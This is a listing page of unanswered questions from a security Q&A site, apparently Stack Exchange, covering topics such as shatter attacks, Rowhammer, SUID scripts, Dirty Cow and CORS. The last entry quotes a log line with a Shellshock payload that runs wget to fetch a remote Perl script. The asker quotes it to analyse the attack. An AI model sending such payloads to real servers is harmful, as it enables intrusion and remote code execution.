current community

your communities

more stack exchange communities

company blog
Stack Exchange Inbox Reputation and Badges
tour help

Unanswered Questions

27
votes
1answer
1k views

Are shatter attacks still possible in the days of User Interface Privilege Isolation?

Before Windows introduced User Interface Privilege Isolation, any application could send all kinds of window messages to any window on the same desktop (a shatter attack), allowing elevation of ...
10
votes
0answers
237 views

What are the privacy differences with Azure trustee delegates in China, Germany, and other locations?

Azure has different privacy agreements set up with different datacenters as mentioned in this footnote Azure is now available in China through a unique partnership between Microsoft and 21Vianet, ...
10
votes
3answers
429 views

Centralized key management for IOS and Android Code Signing

What is the best way for an enterprise to manage code signing certificates? The default seems to be that Apple and Android keys get stored by each developer on their machines. I see systems like ...
9
votes
0answers
2k views

Nginx and HSM integration to hold private keys

We are using Nginx and storing private keys in file on server. We would like to move private keys to HSM, so that ssl keys are stored in HSM and never leaves HSM. All crypto operations required during ...
8
votes
0answers
187 views

Which memory modules are known to be vulnerable to or secure against Rowhammer/Flip Feng Shui?

Many memory modules from different manufacturers have been tested for vulnerability to the Rowhammer exploit. However, some researchers have anonymised their results, possibly for responsible ...
8
votes
2answers
271 views

SUID Scripts vulnerability

In this article, it says that this C-shell script: #!/bin/csh -b set user = $1 passwd $user With these permissions: -rwsr-x--- 1 root helpdesk Is vulnerable because one can manipulate env ...
8
votes
1answer
622 views

Hooking into firefox memory

I am trying to learn how to hook into the browser memory. The Frida tool is a good start to this. My goal is to extract the client-random, server-random and symmetric session keys established at the ...
7
votes
1answer
102 views

GSM encryption suppression

The following papers explain that it is possible to suppress the encryption (or downgrade) in GSM using faked messages: https://pdfs.semanticscholar.org/3a86/4f867aadaea449623ddbf288c18815e7eb00.pdf ...
7
votes
0answers
2k views

Exploiting Dirty Cow using Metasploit

I'm testing on some of my Linux Virtual Machines trying to exploit the Dirty Cow Vulnerability and I'm not able to success using Metasploit. First of all... for interested users, a couple of links to "...
7
votes
0answers
171 views

Odd history of OAuth 2 device flow

OAuth 2 device flow has an odd history. It's found in early versions of the RFC, but was then taken out seemingly without an explanation I could find. Recently, a new draft was proposed specifically ...
7
votes
0answers
464 views

Problem in underscore.js with “new Function()” when CSP header is set

In underscore.js, template rendering causes violation of the 'unsafe-eval' property, with CSP error at following line: render = new Function(settings.variable || 'obj', '_', source); The solution to ...
7
votes
1answer
1k views

Is there any risk to enabling CORS with a wildcard on S3?

By default, Amazon S3 blocks cross-origin requests. However, it allows users the ability to set up per-bucket CORS policies. It offers fairly elaborate controls for which domains and methods the user ...
7
votes
1answer
106 views

Why would some web applications disable Numpad input?

Some web applications (One popular example is Skrill) don't allow input from Numpad for number <input>. I've seen some local websites here also follow the same procedure. The thing is, all of ...
6
votes
0answers
110 views

Why does LUKS use CBC?

I read that LUKS uses 256-bit AES with CBC by default. CBC, of course, has the disadvantages that if you change something in the plain text, you have to change everything that comes after it. In the ...
6
votes
0answers
222 views

Shellshock Exploit evidence - is this a successful attack

I was looking through logs today and noticed the following: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /...

15 30 50 per page
1 2 3 4 5 221